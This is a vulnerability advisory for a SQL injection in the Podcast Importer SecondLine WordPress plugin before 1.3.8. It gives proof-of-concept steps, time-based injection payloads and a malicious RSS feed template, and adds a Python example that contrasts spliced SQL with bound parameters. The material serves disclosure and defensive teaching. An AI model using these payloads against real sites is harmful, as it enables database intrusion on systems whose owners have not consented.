WordPress Plugin Vulnerabilities
Podcast Importer SecondLine < 1.3.8 - Admin+ SQLi
Description
The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by importing a malicious podcast file.
Proof of Concept
Put the XML below on a web server (replacing PAYLOAD with the correct one for the installed version), then import a podcast (/wp-admin/tools.php?page=secondlinepodcastimport), put the URL to the XML in the Podcast Feed URL field and click Import.

Payloads:

v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));#
v < 1.3.8 - <![CDATA[https://satchmo.secondlinethemes.com/?p=82%") union select (sleep(5))#]]>

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="https://dixie.secondlinethemes.com/wp-content/plugins/seriously-simple-podcasting/templates/feed-stylesheet.xsl"?>
<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:atom="http://www.w3.org/2005/Atom"
     xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
     xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
     xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
     xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0">
  <channel>
    <title>Dixie WordPress Theme</title>
    <atom:link href="https://dixie.secondlinethemes.com/feed/podcast" rel="self" type="application/rss+xml" />
    <link>https://dixie.secondlinethemes.com/</link>
    <description>A Powerful Podcasting Theme</description>
    <lastBuildDate>Mon, 09 Nov 2020 10:08:04 +0000</lastBuildDate>
    <language>en-US</language>
    <copyright>© 2021 Dixie WordPress Theme</copyright>
    <itunes:subtitle>A Powerful Podcasting Theme</itunes:subtitle>
    <itunes:author>Dixie WordPress Theme</itunes:author>
    <itunes:summary>A Powerful Podcasting Theme</itunes:summary>
    <itunes:owner>
      <itunes:name>Dixie WordPress Theme</itunes:name>
      <itunes:email>gotyed@gmail.com</itunes:email>
    </itunes:owner>
    <itunes:explicit>clean</itunes:explicit>
    <googleplay:author>Dixie WordPress Theme</googleplay:author>
    <googleplay:email>gotyed@gmail.com</googleplay:email>
    <googleplay:description>A Powerful Podcasting Theme</googleplay:description>
    <googleplay:explicit>No</googleplay:explicit>
    <item>
      <title>Episode 10: New Recording Studios</title>
      <link>https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/</link>
      <pubDate>Wed, 24 Jul 2019 11:16:50 +0000</pubDate>
      <dc:creator>Dixie</dc:creator>
      <guid isPermaLink="false">PAYLOAD</guid>
      <description> <![CDATA[aa]]> </description>
      <itunes:subtitle> <![CDATA[aa]]> </itunes:subtitle>
      <content:encoded> <![CDATA[aa]]> </content:encoded>
      <enclosure url="https://dixie.secondlinethemes.com/podcast-download/82episode-10-new-recording-studios.mp3" length="5425142" type="audio/mpeg"></enclosure>
      <itunes:summary> <![CDATA[aa]]> </itunes:summary>
      <itunes:explicit>clean</itunes:explicit>
      <itunes:block>no</itunes:block>
      <itunes:duration>02:16</itunes:duration>
      <itunes:author>Dixie</itunes:author>
      <googleplay:description> <![CDATA[aa]]> </googleplay:description>
      <googleplay:explicit>No</googleplay:explicit>
      <googleplay:block>no</googleplay:block>
    </item>
  </channel>
</rss>
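The defect class behind this advisory, shown as an added example that is not the plugin's code and not part of the original page: an importer reads the feed's <guid> and looks it up in the database, once by splicing the text into the statement (the vulnerable pattern) and once by binding it as a parameter (the WordPress equivalent is $wpdb->prepare()). The parenthesised LIKE query shape is an assumption inferred from the "%')" prefix of the published payload, not taken from the plugin's source; sqlite3 stands in for MySQL so the example runs offline, and because sqlite has no sleep() the injected statement fails to compile rather than pausing, which is enough to show that the feed text was parsed as SQL. The feed and the posts table are constructed for the example.

```python
"""Added illustration (not the plugin's own code) of feed-controlled <guid>
text reaching the SQL parser, beside the bound-parameter form that prevents it.

Assumptions: the query shape is inferred from the payload's "%')" prefix, not
from the plugin; sqlite3 replaces MySQL so this runs offline.
"""
import sqlite3
import xml.etree.ElementTree as ET

# Constructed feed with the same element structure as the advisory's PoC feed.
# The <guid> carries the advisory's v < 1.3.0 payload string in the PAYLOAD slot.
FEED_XML = """<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <title>Constructed feed</title>
    <item>
      <title>Episode 10: New Recording Studios</title>
      <guid isPermaLink="false">https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));#</guid>
    </item>
  </channel>
</rss>"""


def parse_feed_guids(xml_text):
    """Return the <guid> text of every <item> in an RSS 2.0 feed, as an importer would."""
    root = ET.fromstring(xml_text)
    return [item.findtext("guid", default="") for item in root.iter("item")]


def fresh_db():
    """In-memory table standing in for the posts table an importer checks for duplicates."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, guid TEXT NOT NULL)")
    conn.execute("INSERT INTO posts (guid) VALUES ('https://example.invalid/?p=1')")
    return conn


def find_post_unsafe(conn, guid):
    """Vulnerable pattern: the imported value is spliced into the statement text,
    so a quote in it closes the literal and the rest becomes SQL."""
    sql = "SELECT id FROM posts WHERE guid LIKE ('%" + guid + "%')"
    return conn.execute(sql).fetchall()


def find_post_safe(conn, guid):
    """Hardened pattern: the value is bound as a parameter, so quotes, UNION and
    comment markers inside it are data; the driver never lets them reach the parser."""
    sql = "SELECT id FROM posts WHERE guid LIKE ('%' || ? || '%')"
    return conn.execute(sql, (guid,)).fetchall()


def demo():
    """Run both lookups against the imported guid and report what happened."""
    guid = parse_feed_guids(FEED_XML)[0]
    conn = fresh_db()
    try:
        find_post_unsafe(conn, guid)
        unsafe_error = None          # would mean the payload was treated as data
    except sqlite3.Error as exc:
        unsafe_error = str(exc)      # the payload was compiled as SQL
    safe_rows = find_post_safe(conn, guid)   # bound: no error, simply no match
    return {"guid": guid, "unsafe_error": unsafe_error, "safe_rows": safe_rows}


if __name__ == "__main__":
    result = demo()
    print("imported guid :", result["guid"])
    if result["unsafe_error"]:
        print("unsafe lookup : SQL error ->", result["unsafe_error"])
    else:
        print("unsafe lookup : no error")
    print("bound lookup  :", result["safe_rows"])
```

With a benign guid both lookups return the same row; with the advisory's payload only the spliced version errors out, because its text was compiled as part of the statement. In the fixed plugin the same separation of statement and data is what stops the imported feed from influencing the query.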
Classification
Type
SQLI
Miscellaneous
Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU-ZTE CHENFENG lab
Verified
Yes
Timeline
Publicly Published
2022-03-21
Added
2022-03-21
Last Updated
2022-04-11